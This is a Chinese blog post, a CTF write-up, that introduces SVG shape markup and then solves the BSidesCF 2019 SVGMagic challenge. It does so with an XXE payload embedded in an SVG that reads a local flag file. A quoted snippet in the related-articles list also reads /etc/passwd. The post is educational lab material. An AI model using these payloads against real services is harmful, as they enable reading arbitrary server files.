CTF之从SVG到XML

最新推荐文章于 2024-07-16 08:52:14 发布
最新推荐文章于 2024-07-16 08:52:14 发布
阅读量756 收藏 1
点赞数 1
分类专栏: 安全 CTF 文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/124074975
版权
安全 同时被 2 个专栏收录
23 篇文章 2 订阅
订阅专栏
CTF
18 篇文章 0 订阅
订阅专栏

0x01 SVG:

  1. SVG是一种缩放矢量图形,是基于可扩展标记语言(XML),用于描述二维矢量图形的图形格式。SVG由W3C制定,是一个开放标准。简单的理解,它是图形的另一种格式例如它和常见的图片格式.png、.jpg、.gif等是一类。
  2. 可以直接用代码来描绘图像,可以用任何文字处理工具打开SVG图像,通过改变部分代码来使图像具有交互功能,并可以随时插入到HTML中通过浏览器来观看。
  3. SVG 严格遵从 XML 语法,并用文本格式的描述性语言来描述图像内容,因此是一种和图像分辨率无关的矢量图形格式。

听上去还是懵懵的
请添加图片描述

0x02 SVG实例

在svg标签中,width:宽度 - height:高度 - x:水平方向上的偏移量 - y:竖直方向上的偏移量 - rx、ry:定义圆角效果 - style:样式(这些样式同样适用于下面的图形,所以下面的图形只会介绍属性,不会重复介绍样式) - fill:rgb颜色,表示矩形的填充颜色 - fill-opacity:填充的不透明度 - stroke:rgb颜色,表示矩形的边框颜色 - stroke-width:矩形边框的大小 - stroke-opacity:矩形边框的不透明度

圆形

circle标签属性解释如下: - cx、cy:圆心坐标 - r:圆的半径

<svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <circle cx="100" cy="50" r="40" style="stroke:black; stroke-width:2; fill:blue" />
</svg>

椭圆

ellipse标签属性解释如下: - cx:圆心的x坐标 - cy:圆心的y坐标 - rx:水平半径 - ry:竖直半径

<svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <ellipse cx="100" cy="50" rx="40" ry="50" style="fill:purple" />
</svg>

线条

line标签属性解释如下: - x1:线段的起点x坐标 - x2:线段的终点x坐标 - y1:线段的起点y坐标 - y2:线段的终点y坐标

<svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <line x1="10" y1="10" x2="100" y2="100" style="stroke:red;stroke-width:2" />
</svg>

请添加图片描述
还是要看代码 一看代码就啥都明白了!!!

0X03 SVG从一题到XXE

因为SVG严格遵守XML语言,然而XML语言是可以造成XXE漏洞的,呢么我们构造一下语句,试一下XXE漏洞

[BSidesCF 2019]SVGMagic

在这里插入图片描述
题目说的也很明白,使用magic将svg转换为png

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

根据构造得到的XML代码 上传上去
在这里插入图片描述

H0ne
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SVG常用图形基础学习资料
02-03
SVG:scalable vector graphics 可缩放矢量图形 SVG常用图形基础学习资料
Android 使用xml代码图标代替直接使用图片文件(svgxml
qimeng54321的博客
06-05 370
体积更小更规范方便修改(大小,颜色等),尤其是一些常用的,当换到不同项目有不同配色与尺寸要求时可以直接修改,不需要再次上网找图标。
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
wanan的博客
09-30 599
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
从几道CTF学习Blind XXE
0xdawn的博客
10-03 1132
0x00 前言 对于传统的XXE来说,攻击者只有在服务器有回显或报错的情况下才能使用XXE漏洞来读取服务器端文件。 例如 <!ENTITY file SYSTEM "file:///etc/passwd"> <username>&file;</username> 如果服务器没有回显,只能通过Blind XXE构造一条外带信道来提取数据,也就是数据外带。 一个实例 xml.php <?php libxml_disable_entity_loader(fal
浅谈SVG的两个黑魔法
蚁景网安学院
11-25 1983
之前在CTF比赛中遇到了一些关于SVG造成的安全问题,多亏诸多师傅的题目给我的一顿痛打让我又了解了不少新的知识和SVG在WEB安全中的应用,拓展了我的攻击面。
[BSidesCF 2019]SVGMagic XXE的SVG注入
qq_54929891的博客
05-13 810
进入题目可以看到叫我们利用魔法将SVG转为PNG,查资料了解一下SVG是个啥东西XMLSVG知识总结_叨唠的博客-CSDN博客_svg xml 是一个图片,既然是XML里面的图片标签,那么则可以往XXE注入里面想想,但是SVG不知道怎么构造浅谈SVG的两个黑魔法 - 知乎 我们可以利用text标签来显现文字,将文字改为引用我们的恶意代码即可 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ &lt...
0CTF2017 WEB WriteUp
Bendawang's Blog
03-20 9730
0CTF2017 WEB WriteUp
BUUCTF--[BSidesCF 2019]SVGMagic
qq_46263951的博客
07-22 1059
进去后是一个这样的页面 这里大标题给出提示使用 Magic 将 SVG 转换为 PNG 那啥是SVG呢,先来了解一下 这里SVG是个XML的图片,并且存在可控的内容 这里可以尝试一下XEE漏洞的这种情况 由于不知道flag的路径,所以先用/proc/self/pwd/代表的是当前路径。可以构造/proc/self/pwd/flag.txt读取文件. 最终构造.svg文件内容为 <?xml version="1.0" encoding="UTF-8"?> <!D..
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
CTF训练
qq_43679873的博客
01-11 1221
CTF训练
CTF到工控安全.pdf
02-26
CTF到工控安全.pdf
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
CTF从入门到提升教学视频
01-28
CTF能够锻炼选手对一些漏洞的理解能力,对安全研究、渗透测试也有一定的作用。越来越多的企业招聘安全从业人员时都会对CTF有一定的要求。
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
CTF之二维码扫描.7z
12-02
总之,"CTF之二维码扫描"不仅涉及到二维码技术,还包括了图像处理、数据解码、加密解密、网络安全等多个方面的综合知识。通过掌握这些技能,不仅可以提高在CTF比赛中的表现,也能为日常的信息安全工作打下坚实的基础...
深入理解漏洞之 XXE 漏洞
weixin_50464560的博客
05-16 1132
介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要
XML 验证器:确保数据完整性和准确性的关键工具
wjs2024的博客
07-15 403
XML验证器是一种软件工具,用于检查XML文档是否符合特定的结构和内容规则。这些规则通常定义在一个或多个XML模式(XML Schema)或文档类型定义(DTD)中。通过验证XML文档,可以确保数据的一致性、准确性和可靠性。
mybatis的xml中,where标签不自动删除多余的and之类的问题
最新发布
thels_的博客
07-16 78
原来是注释导致的问题。我在idea使用的一键注释/* */,可能mybatis误以为这是一个内容,然后就觉得这个内容后面需要一个and来连接下面的sql语句,所以就不删除。遇到了这个莫名其妙的问题,起初是很疑惑的,where标签好像失灵了一般不会自动删除掉 多余的and。也就是说条件前面不能出现/* */这样的注释。看了眼sql语句,发现还是有and没被删除。哈哈,有时候碰到一些奇怪的事情真的有点难绷。后来重新写了遍后发现又没事了。然后就研究了好一会,发现!把注释挪开就没事了!
svg点位转成2.5d
11-19
SVG(Scalable Vector Graphics)是一种用于描述二维图形的XML文件格式。而2.5D(Two-and-a-half-dimensional)则是指在平面上呈现出一定的三维效果。 将SVG点位转成2.5D过程需要以下几个步骤: 第一步,对SVG图形进行分析和解析,提取出其中的关键点位信息。这些点位信息包括图形的起点、终点、曲线控制点等。 第二步,根据这些点位信息以及SVG图形的组织结构,确定出图形中的层次结构。这些层次结构包括了不同部分之间的关系,如何进行堆叠和叠加。 第三步,根据层次结构,确定每个图形部分的位置和角度。通过旋转和平移操作,可以将某些部分投射到不同的视角和深度。 第四步,根据确定的位置和角度,将SVG图形转换成对应的2.5D图形。这个过程就是对SVG图形进行透视变换,并且根据不同区域的深度进行一定程度的压缩或拉伸。 最终,将转换后的2.5D图形渲染出来,可以呈现出具有一定三维效果的图像。这些图像在平面上看起来比纯粹的二维图形更加立体和有层次感。 需要注意的是,将SVG点位转成2.5D只是对图形进行了一些透视变换,并没有真正添加第三维的信息。因此,转换后的图形仍然是平面上的二维图形,只不过具有了一定的三维视觉效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值